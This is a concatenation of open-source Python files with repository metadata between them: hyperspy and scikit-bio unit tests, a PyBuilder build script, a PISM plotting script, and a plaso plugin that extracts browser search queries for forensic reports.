p._id_name = 'newone'
_id = p._load_dictionary(d)
class TestComponentDictionary:
def setUp(self):
self.parameter_names = ['par1', 'par2']
self.comp = Component(self.parameter_names)
self.comp.name = 'newname!'
self.comp._id_name = 'dummy names yay!'
self.comp._axes_manager = DummyAxesManager()
self.comp._create_arrays()
self.comp.par1.value = 2.
self.comp.par2.value = 5.
self.comp.par1.std = 0.2
self.comp.par2.std = 0.5
self.comp.store_current_parameters_in_map()
def test_to_dictionary(self):
d = self.comp.as_dictionary()
c = self.comp
nt.assert_equal(c.name, d['name'])
nt.assert_equal(c._id_name, d['_id_name'])
nt.assert_false(d['active_is_multidimensional'])
nt.assert_true(d['active'])
nt.assert_is_none(d['_active_array'])
for ip, p in enumerate(c.parameters):
nt.assert_dict_equal(p.as_dictionary(), d['parameters'][ip])
c.active_is_multidimensional = True
d1 = c.as_dictionary()
nt.assert_true(d1['active_is_multidimensional'])
np.testing.assert_array_equal(d1['_active_array'], c._active_array)
def test_load_dictionary(self):
c = self.comp
d = c.as_dictionary(True)
n = Component(self.parameter_names)
n._id_name = 'dummy names yay!'
_ = n._load_dictionary(d)
nt.assert_equal(c.name, n.name)
nt.assert_equal(c.active, n.active)
nt.assert_equal(
c.active_is_multidimensional,
n.active_is_multidimensional)
for pn, pc in zip(n.parameters, c.parameters):
rn = np.random.random()
nt.assert_equal(pn.twin_function(rn), pc.twin_function(rn))
nt.assert_equal(
pn.twin_inverse_function(rn),
pc.twin_inverse_function(rn))
dn = pn.as_dictionary()
del dn['self']
del dn['twin_function']
del dn['twin_inverse_function']
dc = pc.as_dictionary()
del dc['self']
del dc['twin_function']
del dc['twin_inverse_function']
print(list(dn.keys()))
print(list(dc.keys()))
nt.assert_dict_equal(dn, dc)
@nt.raises(ValueError)
def test_invalid_component_name(self):
c = self.comp
d = c.as_dictionary()
n = Component(self.parameter_names)
id_dict = n._load_dictionary(d)
@nt.raises(ValueError)
def test_invalid_parameter_name(self):
c = self.comp
d = c.as_dictionary()
n = Component([a + 's' for a in self.parameter_names])
n._id_name = 'dummy names yay!'
id_dict = n._load_dictionary(d)
class TestModelDictionary:
def setUp(self):
s = Signal1D(np.array([1.0, 2, 4, 7, 12, 7, 4, 2, 1]))
m = s.create_model()
m.low_loss = (s + 3.0).deepcopy()
self.model = m
self.s = s
m.append(Gaussian())
m.append(Gaussian())
m.append(ScalableFixedPattern(s * 0.3))
m[0].A.twin = m[1].A
m.fit()
def test_to_dictionary(self):
m = self.model
d = m.as_dictionary()
print(d['low_loss'])
np.testing.assert_almost_equal(m.low_loss.data, d['low_loss']['data'])
np.testing.assert_almost_equal(m.chisq.data, d['chisq.data'])
np.testing.assert_almost_equal(m.dof.data, d['dof.data'])
np.testing.assert_equal(
d['free_parameters_boundaries'],
m.free_parameters_boundaries)
nt.assert_is(d['convolved'], m.convolved)
for num, c in enumerate(m):
tmp = c.as_dictionary()
remove_empty_numpy_strings(tmp)
nt.assert_equal(d['components'][num]['name'], tmp['name'])
nt.assert_equal(d['components'][num]['_id_name'], tmp['_id_name'])
np.testing.assert_equal(d['components'][-1]['signal1D'],
(m.signal * 0.3)._to_dictionary())
def test_load_dictionary(self):
d = self.model.as_dictionary()
mn = self.s.create_model()
mn.append(Lorentzian())
mn._load_dictionary(d)
mo = self.model
# nt.assert_true(np.allclose(mo.signal1D.data, mn.signal1D.data))
np.testing.assert_allclose(mo.chisq.data, mn.chisq.data)
np.testing.assert_allclose(mo.dof.data, mn.dof.data)
np.testing.assert_allclose(mn.low_loss.data, mo.low_loss.data)
np.testing.assert_equal(
mn.free_parameters_boundaries,
mo.free_parameters_boundaries)
nt.assert_is(mn.convolved, mo.convolved)
for i in range(len(mn)):
nt.assert_equal(mn[i]._id_name, mo[i]._id_name)
for po, pn in zip(mo[i].parameters, mn[i].parameters):
np.testing.assert_allclose(po.map['values'], pn.map['values'])
np.testing.assert_allclose(po.map['is_set'], pn.map['is_set'])
nt.assert_is(mn[0].A.twin, mn[1].A)
|
vidartf/hyperspy
|
hyperspy/tests/model/test_model_as_dictionary.py
|
Python
|
gpl-3.0
| 9,162
|
[
"Gaussian"
] |
635485d9265a09a0e6aa40291dfc5fe7629b5a90ec6078c0a77b90966c1b542c
|
# pybuilder_header_plugin
# Copyright 2015 Michael Gruber
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, 'src/main/python')
from pybuilder.core import Author, init, use_plugin
from pybuilder_header_plugin import check_source_file_headers
use_plugin('python.core')
use_plugin('python.distutils')
use_plugin('python.flake8')
use_plugin('python.install_dependencies')
use_plugin('pypi:pybuilder_release_plugin')
name = 'pybuilder_header_plugin'
version = '0.0.2'
authors = [Author('Michael Gruber', 'aelgru@gmail.com')]
url = 'https://github.com/aelgru/pybuilder_header_plugin'
description = 'Please visit {0} for more information!'.format(url)
license = 'Apache License, Version 2.0'
summary = 'PyBuilder Header Plugin'
default_task = ['analyze', 'publish', 'check_source_file_headers']
@init
def set_properties(project):
project.depends_on('committer')
project.depends_on('wheel')
project.set_property('flake8_verbose_output', True)
project.set_property('flake8_break_build', True)
project.set_property('pybuilder_header_plugin_break_build', True)
project.set_property('pybuilder_header_plugin_expected_header', open('header.py').read())
project.get_property('distutils_commands').append('bdist_wheel')
project.set_property('distutils_classifiers', [
'Development Status :: 1 - Planning',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4'])
|
arcivanov/pybuilder_header_plugin
|
build.py
|
Python
|
apache-2.0
| 2,364
|
[
"VisIt"
] |
f921e9c95b2effbebbb5c1d7d8c879d1d2bc434f3922daad910bd90a5acbade0
|
#!/usr/bin/env python3
"""
Creates graph of three modeled hydrology-related time series from a single file.
"""
# example from grid-sequencing example:
# $ ./hydro-tsshow.py foo.png ts_routing-decoupled.nc
from numpy import *
import pylab as plt
import sys
try:
import netCDF4 as netCDF
except:
print("netCDF4 is not installed!")
sys.exit(1)
NC = netCDF.Dataset
if len(sys.argv) < 3:
print("hydro-tsshow.py ERROR: ... FIXME ... exiting")
sys.exit(1)
outimage = sys.argv[1]
tsfile = sys.argv[2]
secpera = 31556926.0
scale = 10.0e3
scalestr = '$10^3$'
yaxismin = 1.0e-4 # in scale*kg/s
legloc = 'lower right'
labels = []
plt.figure(figsize=(9, 4))
print("opening file '%s' for reading ..." % tsfile)
try:
ncfile = NC(tsfile, "r")
except:
print("ERROR: can't open file %s for reading ..." % tsfile)
sys.exit(2)
print(" reading 'time' variable ...")
t = ncfile.variables["time"][:] / secpera
n = 3
style = ['b-', 'g-', 'r-']
labels = ['ocean_loss', 'ice_free_land_loss', 'negative_thickness_gain']
for k in range(n):
varname = 'hydro_' + labels[k]
print(" reading '%s' variable ..." % varname)
var = ncfile.variables[varname][:]
plt.semilogy(t, var / scale, style[k], linewidth=2.5)
plt.hold(True)
ncfile.close()
plt.hold(False)
yy = plt.getp(plt.gca(), 'ylim')
plt.setp(plt.gca(), 'ylim', (yaxismin, yy[1]))
plt.legend(labels, loc=legloc)
plt.xlabel("t (years)", size=16)
plt.ylabel("flux (%s kg/s)" % scalestr, size=16)
plt.grid(True)
print("saving image to file '%s' ..." % outimage)
# plt.show()
plt.savefig(outimage, bbox_inches='tight')
|
pism/pism
|
examples/std-greenland/hydro/hydro-tsshow.py
|
Python
|
gpl-3.0
| 1,611
|
[
"NetCDF"
] |
2524143cc3cf8e6ec14b98aaefe5f045a7e5771748cf30356c337b0c643842c2
|
# -*- coding: utf-8 -*-
"""A plugin that extracts browser history from events."""
import collections
import re
from urllib import parse as urlparse
from plaso.analysis import interface
from plaso.analysis import logger
from plaso.analysis import manager
class BrowserSearchPlugin(interface.AnalysisPlugin):
"""Analyze browser search entries from events."""
NAME = 'browser_search'
_EVENT_TAG_LABELS = ['browser_search']
_SUPPORTED_EVENT_DATA_TYPES = frozenset([
'chrome:autofill:entry',
'chrome:cache:entry',
'chrome:cookie:entry',
'chrome:extension_activity:activity_log',
'chrome:history:file_downloaded',
'chrome:history:page_visited',
'cookie:google:analytics:utma',
'cookie:google:analytics:utmb',
'cookie:google:analytics:utmt',
'cookie:google:analytics:utmz',
'firefox:cache:record',
'firefox:cookie:entry',
'firefox:downloads:download',
'firefox:places:bookmark',
'firefox:places:bookmark_annotation',
'firefox:places:bookmark_folder',
'firefox:places:page_visited',
'msiecf:leak',
'msiecf:redirected',
'msiecf:url',
'msie:webcache:container',
'msie:webcache:containers',
'msie:webcache:leak_file',
'msie:webcache:partitions',
'opera:history:entry',
'opera:history:typed_entry',
'safari:cookie:entry',
'safari:history:visit',
'safari:history:visit_sqlite'])
# TODO: use groups to build a single RE.
# Here we define filters and callback methods for all hits on each filter.
_URL_FILTERS = frozenset([
('Bing', re.compile(r'bing\.com/search'), '_ExtractSearchQueryFromURL'),
('DuckDuckGo', re.compile(r'duckduckgo\.com'),
'_ExtractDuckDuckGoSearchQuery'),
('GMail', re.compile(r'mail\.google\.com'),
'_ExtractGMailSearchQuery'),
('Google Docs', re.compile(r'docs\.google\.com'),
'_ExtractGoogleDocsSearchQuery'),
('Google Drive', re.compile(r'drive\.google\.com/drive/search'),
'_ExtractGoogleSearchQuery'),
('Google Search',
re.compile(r'(www\.|encrypted\.|/)google\.[^/]*/search'),
'_ExtractGoogleSearchQuery'),
('Google Sites', re.compile(r'sites\.google\.com/site'),
'_ExtractGoogleSearchQuery'),
('Yahoo', re.compile(r'yahoo\.com/search'),
'_ExtractYahooSearchQuery'),
('Yandex', re.compile(r'yandex\.com/search'),
'_ExtractYandexSearchQuery'),
('Youtube', re.compile(r'youtube\.com'),
'_ExtractYouTubeSearchQuery'),
])
def __init__(self):
"""Initializes an analysis plugin."""
super(BrowserSearchPlugin, self).__init__()
self._search_queries_counter = collections.Counter()
def _ExtractDuckDuckGoSearchQuery(self, url):
"""Extracts a search query from a DuckDuckGo search URL.
DuckDuckGo: https://duckduckgo.com/?q=query
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'q=' not in url:
return None
return self._GetBetweenQEqualsAndAmpersand(url).replace('+', ' ')
def _ExtractGMailSearchQuery(self, url):
"""Extracts a search query from a GMail search URL.
GMail: https://mail.google.com/mail/u/0/#search/query[/?]
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'search/' not in url:
return None
_, _, line = url.partition('search/')
line, _, _ = line.partition('/')
line, _, _ = line.partition('?')
return line.replace('+', ' ')
def _ExtractGoogleDocsSearchQuery(self, url):
"""Extracts a search query from a Google docs URL.
Google Docs: https://docs.google.com/.*/u/0/?q=query
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'q=' not in url:
return None
line = self._GetBetweenQEqualsAndAmpersand(url)
if not line:
return None
return line.replace('+', ' ')
def _ExtractGoogleSearchQuery(self, url):
"""Extracts a search query from a Google URL.
Google Drive: https://drive.google.com/drive/search?q=query
Google Search: https://www.google.com/search?q=query
Google Sites: https://sites.google.com/site/.*/system/app/pages/
search?q=query
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'search' not in url or 'q=' not in url:
return None
line = self._GetBetweenQEqualsAndAmpersand(url)
if not line:
return None
return line.replace('+', ' ')
def _ExtractYahooSearchQuery(self, url):
"""Extracts a search query from a Yahoo search URL.
Examples:
https://search.yahoo.com/search?p=query
https://search.yahoo.com/search;?p=query
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'p=' not in url:
return None
_, _, line = url.partition('p=')
before_and, _, _ = line.partition('&')
if not before_and:
return None
yahoo_search_url = before_and.split()[0]
return yahoo_search_url.replace('+', ' ')
def _ExtractYandexSearchQuery(self, url):
"""Extracts a search query from a Yandex search URL.
Yandex: https://www.yandex.com/search/?text=query
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'text=' not in url:
return None
_, _, line = url.partition('text=')
before_and, _, _ = line.partition('&')
if not before_and:
return None
yandex_search_url = before_and.split()[0]
return yandex_search_url.replace('+', ' ')
def _ExtractYouTubeSearchQuery(self, url):
"""Extracts a search query from a YouTube search URL.
YouTube: https://www.youtube.com/results?search_query=query
Args:
url (str): URL.
Returns:
str: search query.
"""
return self._ExtractSearchQueryFromURL(url)
def _ExtractSearchQueryFromURL(self, url):
"""Extracts a search query from the URL.
Bing: https://www.bing.com/search?q=query
GitHub: https://github.com/search?q=query
Args:
url (str): URL.
Returns:
str: search query, the value between 'q=' and '&' or None if no
query was found.
"""
if 'search' not in url or 'q=' not in url:
return None
return self._GetBetweenQEqualsAndAmpersand(url).replace('+', ' ')
def _GetBetweenQEqualsAndAmpersand(self, url):
"""Retrieves the substring between the substrings 'q=' and '&'.
Args:
url (str): URL.
Returns:
str: search query, the value between 'q=' and '&' or None if no query
was found.
"""
# Make sure we're analyzing the query part of the URL.
_, _, url = url.partition('?')
# Look for a key value pair named 'q'.
_, _, url = url.partition('q=')
if not url:
return ''
# Strip additional key value pairs.
url, _, _ = url.partition('&')
return url
def CompileReport(self, mediator):
"""Compiles an analysis report.
Args:
mediator (AnalysisMediator): mediates interactions between
analysis plugins and other components, such as storage and dfvfs.
Returns:
AnalysisReport: analysis report.
"""
results = {}
for key, number_of_queries in self._search_queries_counter.items():
search_engine, _, search_term = key.partition(':')
results.setdefault(search_engine, {})
results[search_engine][search_term] = number_of_queries
lines_of_text = []
for search_engine, terms in sorted(results.items()):
lines_of_text.append(' == ENGINE: {0:s} =='.format(search_engine))
for search_term, number_of_queries in sorted(
terms.items(), key=lambda x: (x[1], x[0]), reverse=True):
line = '{0:d} {1:s}'.format(number_of_queries, search_term)
lines_of_text.append(line)
# An empty string is added to have SetText create an empty line.
lines_of_text.append('')
lines_of_text.append('')
report_text = '\n'.join(lines_of_text)
analysis_report = super(BrowserSearchPlugin, self).CompileReport(mediator)
analysis_report.text = report_text
analysis_report.report_dict = results
return analysis_report
def ExamineEvent(self, mediator, event, event_data, event_data_stream):
"""Analyzes an event.
Args:
mediator (AnalysisMediator): mediates interactions between
analysis plugins and other components, such as storage and dfvfs.
event (EventObject): event.
event_data (EventData): event data.
event_data_stream (EventDataStream): event data stream.
"""
if event_data.data_type not in self._SUPPORTED_EVENT_DATA_TYPES:
return
url = getattr(event_data, 'url', None)
if not url:
return
for engine, url_expression, method_name in self._URL_FILTERS:
callback_method = getattr(self, method_name, None)
if not callback_method:
logger.warning(
'Missing callback method: {0:s} to parse search query'.format(
method_name))
continue
match = url_expression.search(url)
if not match:
continue
search_query = callback_method(url)
if not search_query:
mediator.ProduceAnalysisWarning(
'Unable to determine search query: {0:s} in URL: {1:s}'.format(
method_name, url), self.NAME)
continue
try:
search_query = urlparse.unquote(search_query)
except TypeError:
search_query = None
if not search_query:
mediator.ProduceAnalysisWarning(
'Unable to decode search query: {0:s} in URL: {1:s}'.format(
method_name, url), self.NAME)
continue
event_tag = self._CreateEventTag(event, self._EVENT_TAG_LABELS)
mediator.ProduceEventTag(event_tag)
lookup_key = '{0:s}:{1:s}'.format(engine, search_query)
self._search_queries_counter[lookup_key] += 1
manager.AnalysisPluginManager.RegisterPlugin(BrowserSearchPlugin)
|
Onager/plaso
|
plaso/analysis/browser_search.py
|
Python
|
apache-2.0
| 10,159
|
[
"VisIt"
] |
6c960f517db43d1ae4112d0fc676d602f87ca20a3799d0e3023d9763c8e8be50
|
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
import io
from unittest import TestCase, main
import pandas as pd
import numpy as np
import numpy.testing as npt
from skbio import DistanceMatrix, TreeNode
from skbio.util._testing import assert_series_almost_equal
from skbio.diversity import (alpha_diversity, beta_diversity,
get_alpha_diversity_metrics,
get_beta_diversity_metrics)
from skbio.diversity.alpha import faith_pd, observed_otus
from skbio.diversity.beta import unweighted_unifrac, weighted_unifrac
from skbio.tree import DuplicateNodeError, MissingNodeError
class AlphaDiversityTests(TestCase):
def setUp(self):
self.table1 = np.array([[1, 3, 0, 1, 0],
[0, 2, 0, 4, 4],
[0, 0, 6, 2, 1],
[0, 0, 1, 1, 1]])
self.sids1 = list('ABCD')
self.oids1 = ['OTU%d' % i for i in range(1, 6)]
self.tree1 = TreeNode.read(io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):'
'0.0,(OTU4:0.75,OTU5:0.75):1.25):0.0)root;'))
self.table2 = np.array([[1, 3],
[0, 2],
[0, 0]])
self.sids2 = list('xyz')
self.oids2 = ['OTU1', 'OTU5']
self.tree2 = TreeNode.read(io.StringIO(
'(((((OTU1:42.5,OTU2:0.5):0.5,OTU3:1.0):1.0):'
'0.0,(OTU4:0.75,OTU5:0.0001):1.25):0.0)root;'))
def test_invalid_input(self):
# number of ids doesn't match the number of samples
self.assertRaises(ValueError, alpha_diversity, 'observed_otus',
self.table1, list('ABC'))
# unknown metric provided
self.assertRaises(ValueError, alpha_diversity, 'not-a-metric',
self.table1)
# 3-D list provided as input
self.assertRaises(ValueError, alpha_diversity, 'observed_otus',
[[[43]]])
# negative counts
self.assertRaises(ValueError, alpha_diversity, 'observed_otus',
[0, 3, -12, 42])
# additional kwargs
self.assertRaises(TypeError, alpha_diversity, 'observed_otus',
[0, 1], not_a_real_kwarg=42.0)
self.assertRaises(TypeError, alpha_diversity, 'faith_pd',
[0, 1], tree=self.tree1, otu_ids=['OTU1', 'OTU2'],
not_a_real_kwarg=42.0)
self.assertRaises(TypeError, alpha_diversity, faith_pd,
[0, 1], tree=self.tree1, otu_ids=['OTU1', 'OTU2'],
not_a_real_kwarg=42.0)
def test_invalid_input_phylogenetic(self):
# otu_ids not provided
self.assertRaises(ValueError, alpha_diversity, 'faith_pd', self.table1,
list('ABC'), tree=self.tree1)
# tree not provided
self.assertRaises(ValueError, alpha_diversity, 'faith_pd', self.table1,
list('ABC'), otu_ids=self.oids1)
# tree has duplicated tip ids
t = TreeNode.read(
io.StringIO(
'(((((OTU2:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(DuplicateNodeError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# unrooted tree as input
t = TreeNode.read(io.StringIO(
'((OTU1:0.1, OTU2:0.2):0.3, OTU3:0.5,OTU4:0.7);'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# otu_ids has duplicated ids
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU2']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# count and OTU vectors are not equal length
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
counts = [1, 2]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# tree with no branch lengths
t = TreeNode.read(
io.StringIO('((((OTU1,OTU2),OTU3)),(OTU4,OTU5));'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# tree missing some branch lengths
t = TreeNode.read(
io.StringIO('(((((OTU1,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# some otu_ids not present in tree
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU42']
self.assertRaises(MissingNodeError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
def test_empty(self):
# empty vector
actual = alpha_diversity('observed_otus', np.array([], dtype=np.int64))
expected = pd.Series([0])
assert_series_almost_equal(actual, expected)
# array of empty vector
actual = alpha_diversity('observed_otus',
np.array([[]], dtype=np.int64))
expected = pd.Series([0])
assert_series_almost_equal(actual, expected)
# array of empty vectors
actual = alpha_diversity('observed_otus',
np.array([[], []], dtype=np.int64))
expected = pd.Series([0, 0])
assert_series_almost_equal(actual, expected)
# empty vector
actual = alpha_diversity('faith_pd', np.array([], dtype=np.int64),
tree=self.tree1, otu_ids=[])
expected = pd.Series([0.])
assert_series_almost_equal(actual, expected)
# array of empty vector
actual = alpha_diversity('faith_pd',
np.array([[]], dtype=np.int64),
tree=self.tree1, otu_ids=[])
expected = pd.Series([0.])
assert_series_almost_equal(actual, expected)
# array of empty vectors
actual = alpha_diversity('faith_pd',
np.array([[], []], dtype=np.int64),
tree=self.tree1, otu_ids=[])
expected = pd.Series([0., 0.])
assert_series_almost_equal(actual, expected)
def test_single_count_vector(self):
actual = alpha_diversity('observed_otus', np.array([1, 0, 2]))
expected = pd.Series([2])
assert_series_almost_equal(actual, expected)
actual = alpha_diversity('faith_pd', np.array([1, 3, 0, 1, 0]),
tree=self.tree1, otu_ids=self.oids1)
self.assertAlmostEqual(actual[0], 4.5)
def test_input_types(self):
list_result = alpha_diversity('observed_otus', [1, 3, 0, 1, 0])
array_result = alpha_diversity('observed_otus',
np.array([1, 3, 0, 1, 0]))
self.assertAlmostEqual(list_result[0], 3)
assert_series_almost_equal(list_result, array_result)
list_result = alpha_diversity('faith_pd', [1, 3, 0, 1, 0],
tree=self.tree1, otu_ids=self.oids1)
array_result = alpha_diversity('faith_pd', np.array([1, 3, 0, 1, 0]),
tree=self.tree1, otu_ids=self.oids1)
self.assertAlmostEqual(list_result[0], 4.5)
assert_series_almost_equal(list_result, array_result)
def test_observed_otus(self):
# expected values hand-calculated
expected = pd.Series([3, 3, 3, 3], index=self.sids1)
actual = alpha_diversity('observed_otus', self.table1, self.sids1)
assert_series_almost_equal(actual, expected)
# function passed instead of string
actual = alpha_diversity(observed_otus, self.table1, self.sids1)
assert_series_almost_equal(actual, expected)
# alt input table
expected = pd.Series([2, 1, 0], index=self.sids2)
actual = alpha_diversity('observed_otus', self.table2, self.sids2)
assert_series_almost_equal(actual, expected)
def test_faith_pd(self):
# calling faith_pd through alpha_diversity gives same results as
# calling it directly
expected = []
for e in self.table1:
expected.append(faith_pd(e, tree=self.tree1, otu_ids=self.oids1))
expected = pd.Series(expected)
actual = alpha_diversity('faith_pd', self.table1, tree=self.tree1,
otu_ids=self.oids1)
assert_series_almost_equal(actual, expected)
# alt input table and tree
expected = []
for e in self.table2:
expected.append(faith_pd(e, tree=self.tree2, otu_ids=self.oids2))
expected = pd.Series(expected)
actual = alpha_diversity('faith_pd', self.table2, tree=self.tree2,
otu_ids=self.oids2)
assert_series_almost_equal(actual, expected)
def test_no_ids(self):
# expected values hand-calculated
expected = pd.Series([3, 3, 3, 3])
actual = alpha_diversity('observed_otus', self.table1)
assert_series_almost_equal(actual, expected)
def test_optimized(self):
# calling optimized faith_pd gives same results as calling unoptimized
# version
optimized = alpha_diversity('faith_pd', self.table1, tree=self.tree1,
otu_ids=self.oids1)
unoptimized = alpha_diversity(faith_pd, self.table1, tree=self.tree1,
otu_ids=self.oids1)
assert_series_almost_equal(optimized, unoptimized)
class BetaDiversityTests(TestCase):
def setUp(self):
self.table1 = [[1, 5],
[2, 3],
[0, 1]]
self.sids1 = list('ABC')
self.tree1 = TreeNode.read(io.StringIO(
'((O1:0.25, O2:0.50):0.25, O3:0.75)root;'))
self.oids1 = ['O1', 'O2']
self.table2 = [[23, 64, 14, 0, 0, 3, 1],
[0, 3, 35, 42, 0, 12, 1],
[0, 5, 5, 0, 40, 40, 0],
[44, 35, 9, 0, 1, 0, 0],
[0, 2, 8, 0, 35, 45, 1],
[0, 0, 25, 35, 0, 19, 0]]
self.sids2 = list('ABCDEF')
def test_invalid_input(self):
# number of ids doesn't match the number of samples
error_msg = ("Number of rows")
with self.assertRaisesRegex(ValueError, error_msg):
beta_diversity(self.table1, list('AB'), 'euclidean')
# unknown metric provided
error_msg = "not-a-metric"
with self.assertRaisesRegex(ValueError, error_msg):
beta_diversity('not-a-metric', self.table1)
# 3-D list provided as input
error_msg = ("Only 1-D and 2-D")
with self.assertRaisesRegex(ValueError, error_msg):
beta_diversity('euclidean', [[[43]]])
# negative counts
error_msg = "negative values."
with self.assertRaisesRegex(ValueError, error_msg):
beta_diversity('euclidean', [[0, 1, 3, 4], [0, 3, -12, 42]])
with self.assertRaisesRegex(ValueError, error_msg):
beta_diversity('euclidean', [[0, 1, 3, -4], [0, 3, 12, 42]])
# additional kwargs
error_msg = ("'not_a_real_kwarg'")
with self.assertRaisesRegex(TypeError, error_msg):
beta_diversity('euclidean', [[0, 1, 3], [0, 3, 12]],
not_a_real_kwarg=42.0)
with self.assertRaisesRegex(TypeError, error_msg):
beta_diversity('unweighted_unifrac', [[0, 1, 3], [0, 3, 12]],
not_a_real_kwarg=42.0, tree=self.tree1,
otu_ids=['O1', 'O2', 'O3'])
with self.assertRaisesRegex(TypeError, error_msg):
beta_diversity('weighted_unifrac', [[0, 1, 3], [0, 3, 12]],
not_a_real_kwarg=42.0, tree=self.tree1,
otu_ids=['O1', 'O2', 'O3'])
with self.assertRaisesRegex(TypeError, error_msg):
beta_diversity(weighted_unifrac, [[0, 1, 3], [0, 3, 12]],
not_a_real_kwarg=42.0, tree=self.tree1,
otu_ids=['O1', 'O2', 'O3'])
def test_invalid_input_phylogenetic(self):
# otu_ids not provided
self.assertRaises(ValueError, beta_diversity, 'weighted_unifrac',
self.table1, list('ABC'), tree=self.tree1)
self.assertRaises(ValueError, beta_diversity, 'unweighted_unifrac',
self.table1, list('ABC'), tree=self.tree1)
# tree not provided
self.assertRaises(ValueError, beta_diversity, 'weighted_unifrac',
self.table1, list('ABC'), otu_ids=self.oids1)
self.assertRaises(ValueError, beta_diversity, 'unweighted_unifrac',
self.table1, list('ABC'), otu_ids=self.oids1)
# tree has duplicated tip ids
t = TreeNode.read(
io.StringIO(
'(((((OTU2:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(DuplicateNodeError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(DuplicateNodeError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# unrooted tree as input
t = TreeNode.read(io.StringIO('((OTU1:0.1, OTU2:0.2):0.3, OTU3:0.5,'
'OTU4:0.7);'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# otu_ids has duplicated ids
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU2']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
# count and OTU vectors are not equal length
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2']
self.assertRaises(ValueError, beta_diversity,
'weighted_unifrac', counts, otu_ids=otu_ids, tree=t)
self.assertRaises(ValueError, beta_diversity,
'unweighted_unifrac', counts, otu_ids=otu_ids,
tree=t)
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
